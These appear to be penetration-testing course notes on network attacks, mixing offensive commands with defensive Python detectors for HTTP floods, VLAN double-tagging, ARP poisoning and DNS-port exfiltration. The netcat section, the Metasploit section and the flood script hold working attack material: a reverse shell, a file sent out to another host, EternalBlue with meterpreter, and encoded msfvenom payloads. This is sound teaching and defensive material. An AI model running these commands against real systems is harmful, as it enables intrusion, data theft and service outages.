## Importance of Network Attacks

- Impact spans from physical/network devices to application interactions
- Helps testers validate segmentation, authentication, and service hardening

## Core Lessons & Techniques

### 1. Stress Testing

- **Purpose:** Push systems to their limits to identify DoS points of failure
- **Load Types:**
    - CPU (processor-bound loops)
    - RAM (memory allocations)
    - Network (packet storms, high-throughput streams)
- **Scaling Approaches:**
    - Vertical (↑ CPU, RAM on one server)
    - Horizontal (add more servers/load balancers)
- **Tools & Scripts:**
    - **Python example (HTTP flood):**
        ```python
        import requests
        import threading

        def flood(target):
            # Request the target URL in an endless loop; request errors are
            # swallowed so the thread keeps going once the server starts refusing
            while True:
                try:
                    requests.get(target, timeout=5)
                except requests.RequestException:
                    pass

        # 100 daemon threads: they die with the main thread when Enter is pressed
        for i in range(100):
            t = threading.Thread(target=flood, args=("http://10.0.0.5/",))
            t.daemon = True
            t.start()

        input("Press Enter to stop…")
        ```
    - **Open-source:** Grinder, Tsung
    - **SaaS:** LoadView, Loader
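The flip side of the flood script is spotting one in the server's own logs. The following is an added example written for these notes (not code from the original): it parses access-log lines in the Apache/nginx combined format, keeps a per-client sliding window, and reports any client that exceeds a request threshold inside that window. The log lines are constructed, and the thresholds and the names `parse_line` / `find_flooders` are choices made here.

```python
"""Flag HTTP-flood candidates in web-server access logs (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx "combined" log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, datetime, request) for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT), m.group("req")


def find_flooders(lines, max_requests=20, window=timedelta(seconds=10)):
    """Return {ip: peak_count} for every client that made more than
    `max_requests` requests inside any sliding window of length `window`.
    Lines are expected in chronological order per client, as logs are written."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue               # skip malformed lines instead of crashing
        ip, ts, _ = parsed
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()            # drop requests that fell out of the window
        if len(q) > max_requests:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks


# Constructed sample: 10.0.0.99 fires 25 requests in two seconds while
# 10.0.0.7 browses normally; one garbage line checks the malformed-line path.
SAMPLE_LOG = [
    f'10.0.0.99 - - [01/Jan/2024:12:00:{i // 13:02d} +0000] "GET / HTTP/1.1" 200 512'
    for i in range(25)
] + [
    '10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '10.0.0.7 - - [01/Jan/2024:12:00:09 +0000] "GET /about.html HTTP/1.1" 200 1024',
    'garbage line that should be skipped',
]

if __name__ == "__main__":
    for ip, n in find_flooders(SAMPLE_LOG).items():
        print(f"possible HTTP flood from {ip}: {n} requests within 10s")
```

The threshold and window are deliberately parameters: what counts as a flood for a static brochure site is normal for an API behind a NAT gateway, so tune them per vhost before wiring the output into a block list or rate limiter.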


---

### 2. Bypassing Segmentation

- **Why:** Network segments limit the blast radius of attacks
- **Techniques:**
    - **VLAN Hopping**
        - _Switch Spoofing:_ Present as an 802.1Q trunk port
        - _Double-Tagging:_ Two VLAN tags; the inner tag routes the frame into the victim VLAN
    - **Multihomed Hosts**
        - Devices on both internal and DMZ segments: pivot points when compromised
- **Demo Example:**
    ```bash
    # Scan for inter-VLAN routes via Nmap
    nmap -Pn -p 1433 --traceroute 10.0.1.50
    ```

- **Mitigation:** Harden trunk configurations, disable auto-trunking (DTP negotiation)
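A detection-side companion to the double-tagging note above, added here and not part of the original notes: a small Ethernet frame parser that walks stacked 802.1Q/802.1ad tags and flags the double-tagged shape, which should never arrive from an endpoint on an access port. The frames it runs on are constructed inline with a helper, and the names `parse_frame`, `is_double_tagged`, `build_frame` and the `native_vlan` parameter are all choices made for this example.

```python
"""Parse Ethernet frames and flag stacked 802.1Q tags (added example)."""
import struct

TPID_8021Q = 0x8100    # customer VLAN tag
TPID_8021AD = 0x88A8   # service/provider tag (QinQ outer)
TAG_TPIDS = {TPID_8021Q, TPID_8021AD}


def parse_frame(frame):
    """Return src/dst MAC, the VLAN IDs in tag order (outer first) and the final
    EtherType. Raises ValueError on truncated frames instead of guessing."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    dst, src = frame[0:6], frame[6:12]
    offset = 12
    vlans = []
    while True:
        if len(frame) < offset + 2:
            raise ValueError("frame truncated inside EtherType/tag")
        ethertype = struct.unpack("!H", frame[offset:offset + 2])[0]
        if ethertype not in TAG_TPIDS:
            break
        if len(frame) < offset + 4:
            raise ValueError("frame truncated inside 802.1Q tag")
        tci = struct.unpack("!H", frame[offset + 2:offset + 4])[0]
        vlans.append(tci & 0x0FFF)   # low 12 bits = VLAN ID; PCP/DEI sit above
        offset += 4
    return {
        "dst": dst.hex(":"),
        "src": src.hex(":"),
        "vlans": vlans,
        "ethertype": ethertype,
        "payload": frame[offset + 2:],
    }


def is_double_tagged(frame, native_vlan=None):
    """True when the frame carries two or more VLAN tags. With native_vlan set,
    only the variant whose outer tag is that VLAN counts: that is the tag the
    first switch strips, leaving the inner tag to steer the frame elsewhere."""
    vlans = parse_frame(frame)["vlans"]
    if len(vlans) < 2:
        return False
    return native_vlan is None or vlans[0] == native_vlan


def build_frame(dst, src, vlans, ethertype, payload):
    """Test helper: build a frame with the given VLAN IDs, outer tag first."""
    frame = bytes.fromhex(dst.replace(":", "")) + bytes.fromhex(src.replace(":", ""))
    for vid in vlans:
        frame += struct.pack("!HH", TPID_8021Q, vid & 0x0FFF)
    return frame + struct.pack("!H", ethertype) + payload


# Constructed samples: an untagged ARP frame, a normal single-tagged IPv4 frame,
# and a double-tagged frame whose outer tag is VLAN 1 and inner tag VLAN 20.
DST, SRC = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
UNTAGGED = build_frame(DST, SRC, [], 0x0806, b"\x00" * 28)
SINGLE = build_frame(DST, SRC, [20], 0x0800, b"\x45" + b"\x00" * 19)
DOUBLE = build_frame(DST, SRC, [1, 20], 0x0800, b"\x45" + b"\x00" * 19)

if __name__ == "__main__":
    for name, f in (("untagged", UNTAGGED), ("single", SINGLE), ("double", DOUBLE)):
        print(name, parse_frame(f)["vlans"], "double-tagged:", is_double_tagged(f))
```

Fed from a span/mirror port with a capture library, the same `parse_frame` call works on live frames; the point of the `native_vlan` argument is that a switch which strips the outer tag leaves nothing for this check to see, so the tap has to sit on the endpoint side of the first switch.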

---

### 3. MAC Spoofing

- **Concept:** Forge your NIC’s MAC address to impersonate an allowed device
- **Common Uses:** Bypass MAC-allow lists, evade NAC
- **Commands:**
    
    - **Kali/Linux (macchanger)**
        ```bash
        sudo macchanger -m 00:11:22:33:44:55 eth0    # set specific MAC
        sudo macchanger -r eth0                     # random MAC
        ```

    - **macOS**        
        ```bash
        sudo ifconfig en0 ether 00:11:22:33:44:55
        ```

---

### 4. NAC Bypass

- **NAC Types:**
    - _Persistent agent_ (corp-owned devices)
    - _Non-persistent agent_ (guest-downloaded)
    - _Agentless_ (802.1X, DHCP binding)

- **Bypass Methods:**    
    - Use an already-compliant host as pivot
    - Spoof exempt device MAC (VoIP phone, printer)

---

### 5. Session-Based (On-Path) Attacks

- **Replay:** Capture & resend valid traffic (e.g., auth handshakes)    
- **Relay:** Proxy between client & server (modify in-flight data)
- **Common Techniques:**
    - **ARP Poisoning**
        ```bash
        arpspoof -i eth0 -t 10.0.0.10 10.0.0.1     # poison target’s ARP cache
        echo 1 > /proc/sys/net/ipv4/ip_forward      # enable IP forwarding
        ```
        
    - **LLMNR/NBT-NS Poisoning** (Responder)
        ```bash
        responder -I eth0 -w -r
        ```
        
    - **DNS Spoofing** (dnschef, mitmproxy)
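Both the MAC spoofing in section 3 and the ARP poisoning above leave the same footprint on the wire: an IP address suddenly answered for by a different MAC, and one MAC answering for several addresses. The following is an added example, not code from the original notes: a minimal monitor in the style of arpwatch that learns IP-to-MAC bindings from ARP replies and alerts on changes, repeated gratuitous replies, and a single MAC claiming more than one IP. The ARP records, the `ArpWatch` class and its method names are constructed here; the sample trace mirrors what the `arpspoof` line above would produce in both directions.

```python
"""Detect ARP poisoning / MAC-spoofing symptoms from ARP replies (added example)."""
from collections import defaultdict


class ArpWatch:
    """Keep the MAC last seen answering for each IP and alert when that binding
    changes or one MAC answers for many IPs."""

    def __init__(self, known=None):
        # Optional seed table {ip: mac}, e.g. from DHCP leases or an asset inventory.
        self.bindings = {ip: mac.lower() for ip, mac in (known or {}).items()}
        self.changes = defaultdict(int)   # ip -> number of binding flips seen
        self.alerts = []

    def observe(self, pkt):
        """pkt: {"op": "request"|"reply", "sender_ip", "sender_mac", "target_ip"}.
        Returns an alert string, or None when the packet looks benign."""
        if pkt["op"] != "reply":
            return None             # requests make no claim worth learning
        ip, mac = pkt["sender_ip"], pkt["sender_mac"].lower()
        prev = self.bindings.get(ip)
        alert = None
        if prev is None:
            self.bindings[ip] = mac
        elif prev != mac:
            self.changes[ip] += 1
            self.bindings[ip] = mac
            alert = f"{ip} moved from {prev} to {mac} (ARP poisoning or MAC spoof?)"
        elif pkt["target_ip"] == ip:
            # Gratuitous reply with an unchanged MAC: normal after boot/failover,
            # suspicious when it repeats, since poisoning tools re-send constantly.
            alert = f"gratuitous ARP for {ip} from {mac}"
        if alert:
            self.alerts.append(alert)
        return alert

    def macs_claiming_many(self, limit=1):
        """MACs currently bound to more than `limit` IPs. A host relaying
        between a victim and the gateway answers for both of their addresses."""
        per_mac = defaultdict(set)
        for ip, mac in self.bindings.items():
            per_mac[mac].add(ip)
        return {mac: sorted(ips) for mac, ips in per_mac.items() if len(ips) > limit}


# Constructed trace: the gateway (10.0.0.1) and a host (10.0.0.10) answer normally,
# then a third MAC starts answering for both of them.
SAMPLE_ARP = [
    {"op": "reply", "sender_ip": "10.0.0.1", "sender_mac": "AA:AA:AA:00:00:01", "target_ip": "10.0.0.10"},
    {"op": "reply", "sender_ip": "10.0.0.10", "sender_mac": "bb:bb:bb:00:00:10", "target_ip": "10.0.0.1"},
    {"op": "request", "sender_ip": "10.0.0.10", "sender_mac": "bb:bb:bb:00:00:10", "target_ip": "10.0.0.1"},
    {"op": "reply", "sender_ip": "10.0.0.1", "sender_mac": "cc:cc:cc:00:00:cc", "target_ip": "10.0.0.10"},
    {"op": "reply", "sender_ip": "10.0.0.10", "sender_mac": "cc:cc:cc:00:00:cc", "target_ip": "10.0.0.1"},
]


def run_sample():
    """Feed the constructed trace through a fresh monitor and return it."""
    watch = ArpWatch()
    for pkt in SAMPLE_ARP:
        watch.observe(pkt)
    return watch


if __name__ == "__main__":
    w = run_sample()
    for line in w.alerts:
        print("ALERT:", line)
    print("MACs answering for several IPs:", w.macs_claiming_many())
```

Seeding `known` from DHCP leases turns the first-sighting case into a real check as well, and the `changes` counter separates a one-off DHCP reassignment from the constant flip-flopping a poisoning tool produces. Switch-side Dynamic ARP Inspection closes the same gap at the access layer where it is available.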

---

### 6. Service Exploitation

- **Certificate Services Attacks:** Forge a trusted certificate via an MD5 collision where a CA still signs with MD5
- **Misconfigured Services:**
    - Directory listings → `http://10.0.0.5/backups/`
    - SMB shares →
        ```bash
        smbclient -L //10.0.0.5 -U guest        # list shares
        smbclient //10.0.0.5/secrets -U guest  # connect to a share (get/mget to download)
        ```

---

### 7. Packet Crafting

- **Purpose:** Test firewalls / IDS / protocol implementations
- **Tools:** Scapy, Hping, Impacket
- **Scapy Demo (TCP SYN):**
    
    ```python
    from scapy.all import IP, TCP, send

    # Bare TCP SYN to port 22 (flags="S"), sent at layer 3 so Scapy fills in the
    # source address and checksums; raw sockets need root / CAP_NET_RAW
    pkt = IP(dst="10.0.0.5") / TCP(dport=22, flags="S")
    send(pkt)
    ```
    
- **SMB Relay (Impacket):**
    ```bash
    ntlmrelayx.py -t smb://10.0.0.5 -smb2support
    ```

---

### 8. Netcat (“Swiss-Army Knife”)

- **Bind Shell (victim listens):**
    ```bash
    # On victim:
    nc -l -p 4444 -e /bin/bash
    # On attacker:
    nc 10.0.0.5 4444
    ```

- **Reverse Shell (victim connects):**    
    ```bash
    # On attacker:
    nc -l -p 4444
    # On victim:
    nc 10.0.0.5 4444 -e /bin/bash
    ```

- **Data Exfiltration:**    
    ```bash
    # Attacker: listen on DNS port
    nc -l -p 53 > stolen.db
    # Victim: exfiltrate file
    nc 10.0.0.2 53 < backup.db
    ```    
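The exfiltration trick above works because port 53 is usually allowed out, not because the traffic is DNS. A defender's check, added here and not part of the original notes, is to verify that bytes on TCP/53 actually parse as DNS: a two-byte length prefix, a header with a valid opcode and reserved bit clear, and a well-formed question name. A raw file piped through `nc` fails at the very first step. The message parser, the `looks_like_dns_over_tcp` check, the `build_query` helper and both sample payloads are constructed for this example; for UDP/53 the same parser applies without the length prefix.

```python
"""Check whether bytes carried on TCP/53 are really DNS messages (added example)."""
import struct


def parse_dns_message(msg):
    """Parse the header and question section of a DNS message (no TCP length prefix).
    Returns a dict, or raises ValueError when the bytes do not fit the wire format."""
    if len(msg) < 12:
        raise ValueError("shorter than a DNS header")
    ident, flags, qd, an, ns, ar = struct.unpack("!6H", msg[:12])
    opcode = (flags >> 11) & 0xF
    if opcode > 5:                         # 0..5 are the assigned opcodes
        raise ValueError(f"unassigned opcode {opcode}")
    if flags & 0x0040:                     # Z bit is reserved and must be zero
        raise ValueError("reserved Z bit set")
    if qd > 1 and opcode == 0:             # standard queries carry one question
        raise ValueError(f"implausible QDCOUNT {qd}")
    offset = 12
    questions = []
    for _ in range(qd):
        labels = []
        while True:
            if offset >= len(msg):
                raise ValueError("truncated QNAME")
            n = msg[offset]
            offset += 1
            if n == 0:
                break
            if n & 0xC0 == 0xC0:           # compression pointer: 2 bytes, ends the name
                offset += 1
                labels.append("<ptr>")
                break
            if n > 63 or offset + n > len(msg):
                raise ValueError("bad label length")
            label = msg[offset:offset + n]
            # Heuristic: hostnames are printable ASCII; binary labels are a red flag
            if not all(32 <= b < 127 for b in label):
                raise ValueError("non-printable bytes in label")
            labels.append(label.decode("ascii"))
            offset += n
        if offset + 4 > len(msg):
            raise ValueError("truncated QTYPE/QCLASS")
        qtype, qclass = struct.unpack("!HH", msg[offset:offset + 4])
        offset += 4
        questions.append((".".join(labels), qtype, qclass))
    return {"id": ident, "opcode": opcode, "qdcount": qd, "ancount": an,
            "questions": questions}


def looks_like_dns_over_tcp(payload):
    """On a TCP/53 stream the first two bytes are a length prefix that must fit the
    data that follows; anything else is not DNS, e.g. a file piped into nc."""
    if len(payload) < 2:
        return False
    (length,) = struct.unpack("!H", payload[:2])
    if length > len(payload) - 2:
        return False
    try:
        parse_dns_message(payload[2:2 + length])
    except ValueError:
        return False
    return True


def build_query(name, qtype=1):
    """Test helper: a minimal standard A query for `name`, with the TCP length prefix."""
    body = struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)   # RD set, one question
    for label in name.split("."):
        body += bytes([len(label)]) + label.encode("ascii")
    body += b"\x00" + struct.pack("!HH", qtype, 1)
    return struct.pack("!H", len(body)) + body


# Constructed samples: a real lookup versus the first bytes of a SQLite file
# being pushed through `nc 10.0.0.2 53 < backup.db`.
GOOD = build_query("example.com")
EXFIL = b"SQLite format 3\x00" + bytes(range(16, 80))

if __name__ == "__main__":
    print("query   :", looks_like_dns_over_tcp(GOOD))
    print("exfil   :", looks_like_dns_over_tcp(EXFIL))
```

The same reasoning is what a protocol-aware firewall or IDS applies when it enforces "port 53 means DNS"; the counterpart to watch for is tunnelling that does wrap the data in syntactically valid DNS, which this shape check alone will not catch.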

---

### 9. Default Credentials

- **Risk:** Unchanged factory passwords → instant takeover
- **Scan & Test:**
    ```bash
    nmap --script default-credentials -p 22,80,443 10.0.0.0/24
    ```
- **Tools:** Hydra, Medusa for automated brute forcing

---

### 10. Metasploit & msfvenom

- **Metasploit Framework:**
    - Exploit modules, payloads, auxiliary scanners
    - **Example:**        
        ```bash
        msfconsole
        use exploit/windows/smb/ms17_010_eternalblue
        set RHOST 10.0.0.5
        set PAYLOAD windows/x64/meterpreter/reverse_tcp
        set LHOST 10.1.1.2
        exploit
        ```

- **msfvenom (payload gen):**    
    ```bash
    msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.2 LPORT=4444 \
             -f elf -o shell.elf
    ```

- **Encoding (Shikata Ga Nai):**
    ```bash
    # x86/shikata_ga_nai only encodes x86 shellcode, so it needs an x86 payload
    msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.2 LPORT=4444 \
             -e x86/shikata_ga_nai -i 5 -f elf -o shell_encoded.elf
    ```